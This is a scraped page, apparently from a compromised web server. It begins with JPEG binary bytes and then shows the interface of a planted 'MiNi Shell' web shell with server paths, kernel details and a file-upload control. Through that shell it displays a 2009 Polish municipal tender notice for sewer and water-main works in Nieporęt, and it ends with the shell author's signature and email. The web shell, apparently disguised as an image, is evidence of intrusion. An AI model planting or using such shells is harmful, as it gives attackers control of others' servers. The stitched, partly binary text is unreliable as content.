JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091016/180029-N-2009.html

<p class="kh_header"><b>Nieporęt: Budowa kanalizacji sanitarnej oraz sieci wodociągowej w ul. Jana Kazimierza w Nieporęcie.</b><br>
<b>Numer ogłoszenia: 180029 - 2009; data zamieszczenia: 16.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nieporęt reprezentowana przez Wójta , Pl. Wolności 1, 05-126 Nieporęt, woj. mazowieckie, tel. 022 7670416, 7670442, faks 022 7670441.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nieporet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej oraz sieci wodociągowej w ul. Jana Kazimierza w Nieporęcie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Kod CPV 45232440-8.  Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków. 
Przedmiotem zamówienia jest budowa sieci kanalizacji sanitarnej w osi jezdni ul. Jana Kazimierza w Nieporęcie (droga wojewódzka nr 633) na odcinku od torów kolejowych do ul. Szkolnej. Z północnego odcinka kanału w ul. Jana Kazimierza (na odcinku od torów kolejowych do ul. Podleśnej) ścieki zostaną odprowadzone projektowanym kanałem w ul. Chabrowej do istniejącej przepompowni ścieków P9, na osiedlu Górki. Istniejący odcinek kanału Dn200 mm od przepompowni P9 w ul. Chabrowej ze względu na jego wypłycenie, należy rozebrać i ułożyć w jego miejsce kanał Dn 200 mm ze spadkiem 50-00, umożliwiającym podłączenie projektowanej kanalizacji. Dla odprowadzenia ścieków z południowego odcinka kanału ul. Jana Kazimierza (rejon od ul. Podleśnej do ul. Szkolnej), przewiduje się małą podziemną tłocznię kanalizacyjną, zlokalizowaną w ul. Chłodnej. Płaszcz tłoczni o średnicy 2,5 m z żelbetowych elementów prefabrykowanych z betonu o klasie wytrzymałości nie niższym niż B.45, wodochłonności W8 i mrozoodporności F-50. Nominalny dopływ do tłoczni 6 m3-h. Zbiornik tłoczni - prostopadłościan o wymiarach 800×1500×500 mm, materiał 0H18N9, elementy montażowe A4/stal kwasoodporna. Pompy wirnikowe - 2 szt. o parametrach pracy Q = 15 m3-h, H = 9 m. Moc silnika 1,1 kW. Poziom ochrony silnika IP55. Zaprojektowano urządzenie zabezpieczająco-sterujące, które zabezpiecza i steruje pracą dwóch asynchronicznych silników elektrycznych agregatów pompowych i umieszczone jest w poliestrowej szafie sterowniczej o stopniu ochronności IP66. Szafa zabezpieczająco sterująca musi spełniać wymagania MPWiK. Praca tłoczni w pełni automatyczna, pomiar poziomu ścieków sondą ultradźwiękową. Jako sterowanie awaryjne poziomami ścieków przewiduje się konduktywne sondy poziomu ścieków. Monitoring przystosowany do technologii przesyłania danych w trybie adresowanych pakietów cyfrowych GPRS, dostępnych w systemie GSM. Zamówienie obejmuje podłączenie sterowania tłoczni do systemu monitoringu MPWiK - Zakład Kanalizacji Obrzeża Jeziora Zegrzyńskiego. 
Zaprojektowano kanały z rur PVC U o sztywności obwodowej SN 8 kN-m2 o średnicy Dz 200 mm o długości 1498,5 m, przykanaliki Dz 160 mm o długości 753,5 m. Przewód tłoczny z rur PE Dn 90 mm o długości 6,5 m. Studnie kanalizacyjne rewizyjne prefabrykowane żelbetowe O 1,2 m oraz inspekcyjne O 425 mm PE z rurą teleskopową. Projektowana kanalizacja jest częścią kanalizacji obrzeża Jeziora Zegrzyńskiego i będzie użyczona przez Gminę Nieporęt do eksploatacji przez Miejskie Przedsiębiorstwo Wodociągów i Kanalizacji  w m. st. Warszawie S.A, Zakład Kanalizacji Obrzeża Jeziora Zegrzyńskiego, 05 - 135 Wieliszew ul. 600Lecia 20. Budowa kanalizacji będzie się odbywała pod nadzorem technicznym MPWiK. Koszty nadzoru technicznego ze strony MPWiK są po stronie Zamawiającego.
Budowa kanalizacji w ul. Chabrowej na odcinku ok.230 mb musi być prowadzona pod nadzorem archeologa. Koszty nadzoru i badań archeologicznych ponosi Zamawiający.
2. Kod CPV 45231300-8.  Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków.
Przewód wodociągowy zaprojektowano po zachodniej stronie ul. Jana Kazimierza pomiędzy projektowanym kanałem sanitarnym i istniejącym krawężnikiem drogowym. Projektowany przewód będzie włączony do istniejącego przewodu wodociągowego Dz 160 mm w rejonie torów kolejowych oraz w istniejący przewód Dz 160 mm w ul. Szkolnej. Przewód wodociągowy zaprojektowano z rur Dz 160 mm PVC - U SDR17 PN10 o długości 1154,5 m i Dz 110 mm PVC - U SDR17 PN10 o długości 7,5 m oraz przewód z rur PVC Dz 90 mm o długości 102,00 m. Na przewodzie co około 100 - 150 m hydranty podziemne. Przyłącza wodociągowe z rur PEHD DN63 SDR17 PN10 o długości 664,5 m. Na przyłączach zasuwy odcinające domowe z miękkim uszczelnieniem zlokalizowane w chodniku.
Roboty kanalizacyjne i wodociągowe wykonywane będą we wspólnym wykopie. Głębienie wykopów pod osłoną ścianki z grodzią G62. Zgłębianie grodzic przy użyciu wibromłotów o dużej częstotliwości i małej amplitudzie. W miejscach zbliżenia do budynków osłabionej konstrukcji grodzice będą wciskane. Długość frontu robót odwodnieniowych i wykopu dogłębionego L = 20 m. Ścianka szczelna będzie chronić wykop na długości 40 m t.j 10 m przed frontem robót odwodnieniowych i 10 m za frontem robót. Obniżenie poziomu wody w wykopie przy pomocy igłofiltrów, długości 6 m z filtrem o dużej przepustowości min. O2 lub O4 i długości lf = 1m. Pompowanie należy prowadzić w sposób ciągły. Odbiornikiem pompowanej wody będzie istniejący kanał deszczowy O 400 mm w ul. Jana Kazimierza.
3. Kod CPV 45233142-6.  Roboty drogowe w zakresie naprawy dróg.
Roboty drogowe - odtworzenie nawierzchni po robotach montażowych - wykonanie konstrukcji dla KR4. Warstwy konstrukcyjne wykonać wg wymagań MZDW:
- warstwa podbudowy z kruszywa łamanego 0-31,5 stabilizowana mechanicznie 	20 cm
- warstwa podbudowy z betonu asfaltowego BA0-25 				13 cm
- warstwa wiążąca z betonu asfaltowego BA0-20 z polimeroasfaltem 		6 cm
- warstwa ścieralna z betonu asfaltowego BA0-12,8 z polimeroasfaltem 		4 cm
Warstwy podbudowy i warstwę wiążącą ułożyć na długości budowanej kanalizacji do wysokości istniejącej powierzchni jezdni. Warstwę ścieralną należy ułożyć na całej szerokości jezdni ul. Jana Kazimierza i długości budowanej kanalizacji i sieci wodociągowej.
4. Zakres robót objętych niniejszym postępowaniem opisany jest w przedmiarze robót, stanowiącym załącznik nr 3 do SIWZ.
5.   Zamówienie obejmuje także obowiązki Wykonawcy polegające na:
1) powierzeniu kierowania robotami kierownikowi budowy, posiadającemu odpowiednie   uprawnienia budowlane w specjalności:
a) instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych,
b) instalacyjnej w zakresie  instalacji elektrycznych, 
c) w specjalności drogowej.
2) zapewnieniu obsługi geodezyjnej i wykonanie inwentaryzacji geodezyjnej, w tym również na mapach należących do zasobu PKP S.A.,
3) wykonanie projektu organizacji ruchu na czas budowy (ul. Jana Kazimierza - droga wojewódzka, ul. Różana, Chabrowa i Podleśna - drogi gminne), 
4) wykonanie robót i czynności wynikających z projektu, o którym mowa w pkt 3, w tym zapewnienie komunikacji kołowej i pieszej w miejscach skrzyżowań wykopu z istniejącymi wjazdami i dojściami do posesji poprzez ułożenie pomostów przejazdowych i kładek,
5) zapewnienie nadzoru specjalistycznego budowy w pasie drogowym drogi wojewódzkiej, na terenie PKP z branżowych jednostek kolejowych oraz przy kolizjach z gazociągami, kablami telekomunikacyjnymi i innym uzbrojeniem,
6) wykonanie badania zagęszczenia gruntu po robotach budowlanych,
7) inwentaryzacja stanu technicznego budynków w odległości do 20 m od miejsca zabicia grodzic na całej długości,
8) wykonanie badań fizykochemicznych i bakteriologicznych wody po wybudowaniu przewodu wodociągowego,
9) podłączenie sterowania tłoczni do systemu montoringu MPWiK - Zakład Kanalizacji Obrzeża Jeziora Zegrzyńskiego w Wieliszewie. 
     
6. Jako zasadę przyjmuje się wymóg, iż w ofercie  należy przyjąć stosowanie materiałów i urządzeń spełniających  normy i parametry  techniczne  wyspecyfikowane w dokumentacji  projektowej  oraz w Specyfikacji  technicznej  wykonania i  odbioru robót budowanych, nie gorsze  w zakresie parametrów  technicznych  i jakościowych od urządzeń  wskazanych  w tej  dokumentacji technicznej.
7. Zamawiający posiada projekt budowlano - wykonawczy odwodnienia wykopów na czas budowy, z zastrzeżeniem, że zakres robót obejmujących odwodnienie musi być dostosowany do stwierdzonych, w trakcie realizacji robót, warunków hydrogeologicznych. Koszty odwodnienia objęte są wynagrodzeniem ryczałtowym za wykonanie umowy, ich wysokość określa cena ryczałtowa podana w formularzu ofertowym, której wartość (wysokość) nie podlega zmianie, niezależnie od warunków hydrogeologicznych występujących w trakcie budowy. Do udziału w przetargu wymagana jest akceptacja tego warunku.
V. Szczegółowy opis przedmiotu zamówienia:
1. Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa oraz Specyfikacja techniczna wykonania i odbioru robót budowlanych- dotycząca robót objętych niniejszym postępowaniem, stanowiące załączniki nr 7, 8, 9 i 10 do SIWZ .
2. Zamawiający udostępnia do wglądu dokumentację projektową (techniczną) i Specyfikację techniczną wykonania i odbioru robót budowlanych na stronie internetowej Zamawiającego, to jest  www.bip.nieporet.pl oraz w siedzibie Zamawiającego, to jest w Urzędzie Gminy Nieporęt, pod adresem 05 - 126 Nieporęt, Pl. Wolności 2A, Dział Inwestycji i Zamówień Publicznych pok. nr 2 tel. (0-22) 767-04-35, 767 - 04 - 16, w godzinach pracy Urzędu Gminy t.j. poniedziałek  w godz. od 800 do  1800, w pozostałe dni w godzinach godz. od 800 - do 1600. 
3. Wykonawca otrzymuje od Zamawiającego przedmiar robót objętych zamówieniem, stanowiący   
     załącznik nr 3 do SIWZ.
4. Zamawiający zaleca odbycie wizji lokalnej  na miejscu  realizacji  przedmiotu zamówienia w celu  oceny, na własną odpowiedzialność, koszt i ryzyko wszystkich  czynników  koniecznych do  przygotowania oferty, wyceny  zamówienia i podpisania umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.40-8, 45.23.13.00-8, 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości 100 000,00 (słownie: sto tysięcy) złotych. 
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu;
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Urzędu Gminy w Banku Spółdzielczym w Legionowie O-Nieporęt nr 25 8013 1029 2003 0003 7415 0002, z dopiskiem Budowa kanalizacji sanitarnej oraz sieci wodociągowej w ul. Jana Kazimierza w Nieporęcie.
4. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych na rachunek bankowy, o którym mowa w ust. 3, przed upływem terminem składania ofert.
5. Dokumenty, o których mowa w ust. 2 pkt 2 - 5, muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu wystąpienia zdarzeń, o których mowa w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych, przy czym 
1) w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokumenty te muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich,
2) dokumenty te będą zawierały klauzule zapłaty sumy wadialnej na rzecz zamawiającego bezwarunkowo i na pierwsze żądanie,
3) dokumenty te zostaną złożone w oryginale. 
6. Dokumenty, o których mowa w ust. 2 pkt 2 - 5, należy złożyć w siedzibie Zamawiającego przed upływem terminu składania ofert lub wraz z ofertą.
7. Wadium w formie, o której mowa w ust. 2 pkt 1 zostanie uznane jako wniesione, jeżeli zostanie zaksięgowane na rachunku, o którym mowa w ust. 3 przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, to jest:
1) posiadają uprawnienia do wykonywania działalności zgodnej z przedmiotem zamówienia;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami
zdolnymi do wykonania zamówienia lub przedstawiają pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia t.j.: 
a) wykonali w przeciągu ostatnich 5 lat przynajmniej dwie roboty budowlane sieci kanalizacyjnych w gruntach o wysokim poziomie wód gruntowych o długości minimum 1,0 km każda i przynajmniej dwie przepompownie ścieków,
b) dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia co najmniej 3 osób, będących są członkami właściwej izby zawodowej, w tym:
- kierownikiem budowy posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych,
- specjalistą ds. elektrycznych posiadającym uprawnienia w zakresie  instalacji elektrycznych,
- specjalistą ds. drogowych posiadającego uprawnienia w zakresie budowy dróg.
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.
a) są ubezpieczeni w zakresie prowadzonej działalności gospodarczej od odpowiedzialności cywilnej na kwotę co najmniej 3 000 000 zł (słownie: trzy miliony zł);
b) przedstawią informację banku, w którym wykonawca posiada rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy  w wysokości  min. 3 000 000 zł, wystawioną nie wcześniej niż  3 miesiące przed upływem terminu składania ofert.
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Z postępowania o udzielenie zamówienia wyklucza się wykonawców na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i tych, którzy nie spełniają warunków z art. 22 ust. 1 ustawy.
3. Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, jeżeli Wykonawca złoży:
1) oświadczenie, że spełnia wymogi określone przez art. 22 ust. 1 ustawy Prawo zamówień 
     publicznych,
2) dokumenty i oświadczenia określone w pkt XII niniejszej SIWZ. 
4. Zasady wspólnego ubiegania się wykonawców o udzielenie zamówienia ( konsorcjum).
1)Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku wspólnego ubiegania się o udzielenie zamówienia, przepisy i wymogi dotyczące wykonawcy stosuje się również do wykonawców występujących wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. 
2) Oferta winna zawierać dokumenty, oświadczenia i informacje wymienione w pkt XII .
3) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek określony w ust. 1 pkt 4 musi spełnić każdy z wykonawców, warunki określone w ust. 1 pkt 1-3 wykonawcy muszą spełnić łącznie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca składa w postępowaniu następujące dokumenty i oświadczenia:
1)aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; jeżeli wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten składa każdy z nich;
2)aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, że Wykonawca nie zalega z uiszczaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; jeżeli wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten składa każdy z nich;
3)aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten składa każdy z nich;
4)aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten składa każdy z nich;
5)wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca i które wykonywać będą zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności potwierdzające spełnienie warunku, o którym mowa w pkt XI ust. 1 pkt 2 lit. b. Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten składa jeden z nich;
6)pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5 wykonawca wykazał osoby którymi będzie dysponował. Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten składa jeden z nich;
7)dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, w zakresie instalacji elektrycznych oraz w zakresie budowy dróg oraz aktualne zaświadczenia, że osoby te są członkami właściwej izby zawodowej; 
8)wykaz wykonanych w ciągu ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia tj. co najmniej dwiema robotami budowlanymi sieci kanalizacyjnych w gruntach o wysokim poziomie wód gruntowych o długości minimum 1,0 km każda oraz budowami dwóch przepompowni ścieków, z określeniem długości sieci, warunków gruntowych oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie (referencje);
9)polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na  kwotę min. 
	3 000 000 (słownie: trzy miliony) złotych;
10)informację banku, w którym wykonawca posiada rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową  wykonawcy w wysokości  min. 
	3 000 000 (słownie: trzy miliony) złotych, wystawioną nie wcześniej niż 3 miesiące przed        	upływem terminu składania ofert;
11)oświadczenie zgodnie z art. 22 ust. 1 oraz art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych, złożone zgodnie ze wzorem określonym w załączniku nr 4A i 4B do SIWZ;
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zastosowanie znajduje § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakie może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mają być składane (Dz. U. Nr 87, poz. 605 z późn. zm.).

3. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
4. Dokumenty należy przedstawić w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę/y uprawnioną/e do reprezentacji wykonawcy. Oświadczenie, o którym mowa w ust. 1 pkt 11 należy przedstawić w oryginale.
5. Wykonawca powinien wraz z ofertą złożyć także oświadczenie wskazujące, które części  zamówienia Wykonawca zamierza zlecić podwykonawcom, zgodnie z wzorem oświadczenia  określonym w załączniku nr 5 do SIWZ.
6. Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy. Pełnomocnictwo w formie oryginału lub kopii potwierdzonej notarialnie należy dołączyć do oferty. Pełnomocnictwo dla podmiotu lub osoby reprezentującej wykonawców w postępowaniu powinno być wystawione zgodnie z wymogami prawa, podpisane przez osoby uprawnione do reprezentowania każdego z wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.nieporet.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Nieporęt
Pl. Wolności 2A 
05-126 Nieporęt pok 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.11.2009 godzina 10:00, miejsce: Urząd Gminy Nieporęt
Pl. Wolności 1
05-126 Nieporęt, kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com